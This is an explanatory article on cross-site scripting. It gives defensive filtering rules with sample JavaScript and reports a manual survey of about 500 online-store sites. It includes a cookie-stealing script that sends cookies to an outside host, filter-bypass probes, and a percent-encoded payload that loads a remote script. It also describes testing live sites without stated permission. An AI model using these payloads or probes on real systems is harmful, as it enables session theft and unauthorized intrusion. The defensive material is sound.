Today, one of the most popular types of attack is cross-site scripting (XSS) using JavaScript. In this article, we will look at the problems caused by malicious use of JavaScript, cover security rules that help prevent XSS attacks, and present our own research on how well websites are protected.

What is an XSS attack?

It is a type of attack that injects malicious code into a web application, forcing it to display modified data, replace links (visible or hidden), or show the attacker's own advertisements on the affected resource.

There are two kinds of attack:

Passive – attacks that require direct involvement of the victim. The point is to trick the victim into following a malicious link so that the "malicious code" executes. This type of attack is harder to pull off, because it requires not only technical but also psychological skills.

Active – attacks in which a hacker tries to find a vulnerability in the website's filter. How is such an attack carried out? Quite simply: the attacker crafts a request from a combination of tags and symbols so that the site accepts it and executes the command. As soon as a security hole is found, "malicious code" can be inserted into the request, for example code that steals cookies and sends them somewhere convenient for the attacker. Here is an example of a script that steals cookies from a website:

var img = new Image();
img.src = "http://site.gif?" + document.cookie;

Finding a security hole in a site usually takes hard work, since most filters are fairly robust. But filters are written by people, and people make mistakes.

Security rules

Where do such vulnerabilities come from, and why do they lead to catastrophic consequences? It comes down to the attentiveness and knowledge of people. Developers must write correct code, so in this section we discuss the minimum security rules for building websites.

We have already described how the attack works, but let's repeat it: the whole point of an XSS attack is to find a hole in the filter and bypass it.

1. One of the first and most basic rules for a developer is to use some filter, even the most minimal one.

In our study, almost all of the sites were protected, but there were still some that did not filter incoming data at all. This was mostly found on sites written in plain PHP. Python frameworks such as Flask and Django, by contrast, ship with minimal built-in escaping; it only remains to strengthen it.
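As a sketch of such a minimal filter, HTML-escaping the handful of characters a payload needs to break out of HTML context is a reasonable first line of defense (the function name and the exact character set here are our own illustration, not a standard API):

```javascript
// Minimal output filter: replace the characters an XSS payload relies on
// with their harmless HTML entity equivalents. Ampersand must go first,
// or already-escaped entities would be double-escaped incorrectly.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

console.log(escapeHtml('<script>alert("xss")</script>'));
// → &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
```

Applied to every piece of user-supplied data before it is written into a page, this alone stops the basic injection shown earlier.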

2. Filter characters and nested constructs.

A minimal filter will protect you from amateurs and careless specialists, but against serious hackers you need stronger protection with more thorough filtering of the data. Developers should think through how an XSS attack could be carried out and build the filter so that it recognizes nested constructs. For example, a hacker can build a multi-level construct and place the malicious JavaScript in the innermost layer: the filter strips the outer layer, but the inner one survives and executes.
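To see why a single-pass filter fails on nested constructs, consider a naive tag-stripping filter (a sketch; the function names are our own):

```javascript
// Naive single-pass filter: removes "<script>" exactly once per match.
function stripOnce(input) {
  return input.replace(/<script>/gi, "");
}

// A nested construct defeats it: removing the inner tag
// reassembles an outer one from the surrounding fragments.
console.log(stripOnce("<scr<script>ipt>alert(1)</script>"));
// → <script>alert(1)</script>

// More robust version: repeat the stripping until the input
// stops changing, so pieces cannot reassemble into a tag.
function stripNested(input) {
  let previous;
  do {
    previous = input;
    input = input.replace(/<\/?script>/gi, "");
  } while (input !== previous);
  return input;
}

console.log(stripNested("<scr<script>ipt>alert(1)</script>"));
// → alert(1)
```

The same "repeat until stable" idea applies to any removal-based filter, whatever the set of tags it targets.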

3. The filter should take into account all possible combinations of characters.

One of our favorite probes for XSS vulnerabilities uses opening and closing brackets.
For example: "/?,#">>>><<script{()}

We submit a request with an arbitrary number of brackets. The filter sees them and tries to close them, but the nested code still executes. With this request we test not only how the filter handles an unbalanced number of brackets, but also how it reacts to various special characters: whether it blocks them or lets them through. Note the construct at the end of the example: we pass the script fragment as an argument in braces, a fun way to test a filter. In our study, many sites did not filter this type of input and were therefore at risk.
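One simple way to check a filter against such a probe is to assert that no raw angle brackets survive in the output, since without them no tag can be formed (the helper below is our own illustration, not a complete filter):

```javascript
// Probe string from the example above: an unbalanced mix of quotes,
// brackets, and a braced script fragment.
const probe = '"/?,#">>>><<script{()}';

// A filter under test should leave no raw < or > in its output.
function neutralize(input) {
  return input.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

const out = neutralize(probe);
console.log(/[<>]/.test(out)); // → false: no executable tag can survive
```

A filter that merely tries to balance or close the brackets, rather than escaping them, would fail this check.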

4. Handling tags.

Suppose you filter both characters and nested constructs. There is still another vulnerability, associated with the img, bb, and url tags. These tags have many parameters, including dynsrc and lowsrc, which can contain JavaScript. Such tags must be filtered without fail. If you do not plan to use images on the site at all, it is better to disable them entirely.

Usage example:

[img]http://blabla.ru/1.jpg/dynsrc=javascript:alert()[/img]

Unfortunately, simple tag filtering is not enough; you must also account for the possibility that an attacker places additional characters inside the tag, and these must be filtered as well.

For example:

[img]"">"<script>http://blabla.ru/1.jpg/dynsrc=javascript:alert()[/img]
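A sketch of a stricter approach for [img] tags: instead of trying to blacklist dangerous characters inside the tag, validate that the tag body is a plain image URL and reject everything else (the function name and the exact URL pattern are our own assumptions):

```javascript
// Accept only [img]...[/img] whose body is a clean http(s) image URL.
// Quotes, angle brackets, "=", and "javascript:" simply cannot match
// the character class, so both example payloads above are rejected.
const SAFE_IMG = /^\[img\](https?:\/\/[\w.\-\/]+\.(?:jpg|jpeg|png|gif))\[\/img\]$/i;

function renderImgTag(bbcode) {
  const match = SAFE_IMG.exec(bbcode.trim());
  if (!match) return ""; // reject outright instead of trying to clean up
  return '<img src="' + match[1] + '">';
}

console.log(renderImgTag("[img]http://blabla.ru/1.jpg[/img]"));
// → <img src="http://blabla.ru/1.jpg">
console.log(renderImgTag("[img]http://blabla.ru/1.jpg/dynsrc=javascript:alert()[/img]"));
// → "" (rejected)
```

Whitelisting what is allowed is generally safer than enumerating what is forbidden, because new bypass tricks do not need to be anticipated one by one.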

5. Encoding.

When building a filter, you must first of all consider encoding-based attacks. There are many encoder tools that encode a payload so that the filter cannot recognize it. Therefore the filter must decode the request before the application executes it.

Here is an example of an encoded payload:

%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E

Encoding is useful to an attacker not only for bypassing filters, but also for social engineering, i.e. deceiving people: an encoded payload can be sent as a link, and hardly anyone will bother to check what it decodes to. This leads us to the next point.
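The decoding step can be sketched like this: percent-decode the input repeatedly until it stops changing, then run the result through the filter. Decoding once is not enough, because the payload may be double-encoded (the function name is our own):

```javascript
// Decode percent-encoding repeatedly, so that double-encoded payloads
// such as "%253Cscript%253E" cannot hide from the filter.
function fullyDecode(input) {
  let previous;
  do {
    previous = input;
    try {
      input = decodeURIComponent(input);
    } catch (e) {
      break; // malformed escape sequence: stop and filter what we have
    }
  } while (input !== previous);
  return input;
}

console.log(fullyDecode("%253Cscript%253E")); // → <script>
```

Only after this normalization does it make sense to apply the character and tag filters from the previous rules.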

6. Social engineering.

It is not enough to write an attack-resistant filter; you should also periodically hold training sessions with employees about the rules for using the Internet and the tricks hackers employ.

A couple of basic rules: never open suspicious links, and check encoded ones before clicking, especially if you are a hosting or network administrator.

Investigating sites for XSS vulnerabilities using JavaScript

How seriously do developers take the security of their web applications? Our team decided to find out. As part of our research, we examined about 500 sites for security flaws. A lot of time went into collecting, processing, and structuring the information. All checks were carried out manually, because we did not find a suitable tool, and we lacked the time and knowledge to write our own software. With the experience now gained, next time that is exactly what we will do.

The objects of our research were online store websites. We chose them because such sites offer feedback forms. Through such a form, using social engineering, one can slip a link with malicious code to the site operator and cause not only a leak of personal data, but also defacement of the site, illegal injection of advertising via JavaScript elements, and replacement of real links with malicious ones.

It is worth mentioning that we only tested the filters; this does not violate the legislation of the Russian Federation (Articles 272-274 of the Criminal Code) and carries no penalty.

The research produced fairly telling statistics. A very small share of sites, about 5%, have no filter at all, which is a fundamentally flawed design. In practice it turned out that all of these sites had been built by students. Sites without a filter are effectively hacked by default: they do not escape forbidden characters, and "harmful code" can be pushed to them via JavaScript. The remaining sites do have filters, but how reliable are they?

We were able to bypass about 11% of them with only average knowledge in this area. This is a serious flaw on the developers' part that can do a project a great deal of harm, because users' personal data comes under attack. Under the law (Article 13.11 of the Administrative Code, Part 6), all sites must ensure the safety of personal data when storing it and prevent unauthorized access to it. If unlawful access to personal data results (destruction, modification, copying, blocking, etc.), a fine of 700 to 50,000 rubles may be imposed.

Most of the sites are well protected from attacks, which is good news for us as users. The results of the study are clearly shown in the diagram below.

Conclusion

In this article, we described XSS vulnerabilities that use JavaScript and conducted a real study of how well sites withstand attacks. The security assessment found that most sites, namely 84%, are well protected against this type of attack. Still, a certain share of sites cannot withstand attacks and should not be trusted. This is a gross defect that needs to be corrected. Unfortunately, not all website owners are willing to invest in improving their site's security. But every year the law on disclosure, leakage, and damage of personal data grows stricter, forcing negligent owners to watch the safety of their resources more closely.